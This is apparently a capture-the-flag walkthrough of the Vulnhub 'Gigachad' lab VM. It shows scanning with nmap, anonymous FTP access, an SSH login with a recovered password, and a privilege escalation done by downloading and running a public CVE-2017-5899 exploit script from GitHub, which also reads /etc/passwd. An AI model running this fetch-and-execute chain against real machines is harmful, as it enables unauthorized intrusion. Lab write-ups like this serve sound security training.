Gigachad -: (Vulnhub) Walkthrough
I personally enjoyed playing with this box, this box taught me how to stay focused while doing enumeration and exploitation. There’s so much going on with this box for post exploitation. let’s pwn it ..!!!
Here is the link to downlaod this VM:-
Network Scanning
We always start with network scanning, Let’s find the target IP address by running netdiscover.
┌─[✗]─[root@RDX]─[~]
└──╼ #netdiscover -i wlan0
As we saw in netdiscover result. Our target ip address is 192.168.250.187
Enumeration/Reconnaissance
Our next step is scanning the target machine. let’s start with nmap.
┌─[✗]─[root@RDX]─[~]
└──╼ #nmap -v -sT 192.168.250.187 -p-
┌─[root@RDX]─[~]
└──╼ #nmap -v -sT -sV -A -O 192.168.250.187 -p-
So we can see 3 ports are open and in port number 21 , anonymous login of ftp is allowed, So let’s see what’s there in it
user — ftp
password — any email
┌─[root@RDX]─[~]
└──╼ #ftp 192.168.250.187
ftp> ls
ftp> get chadinfo
ftp> exit
┌─[root@RDX]─[~]
└──╼ #cat chadinfo
http://192.168.250.187/drippinchad.png
Wo wo wo ,so we can see there’s a pic ,and yea this place’s name might be the pass ,so let’s see this image in Google image
username = chad
password = maidenstower
┌─[root@RDX]─[~]
└──╼ #ssh chad@192.168.250.187
chad@gigachad:~$ id
chad@gigachad:~$ cat /etc/passwd
chad@gigachad:~$ ls
chad@gigachad:~$ cat user.txt
I got the User Flag
Privilege Escalation
chad@gigachad:~$ find / -perm -u=s -type f 2>/dev/null
https://github.com/bcoles/local-exploits/blob/master/CVE-2017-5899/exploit.sh
chad@gigachad:~$ wget https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh
chad@gigachad:~$ ls
chad@gigachad:~$ chmod +x exploit.sh
chad@gigachad:~$ ./exploit.sh
# bash
root@gigachad:/root# cd /root
root@gigachad:/root# ls
root@gigachad:/root# cat root.txt
Successfully got the root privilege and the ‘root.txt’ .
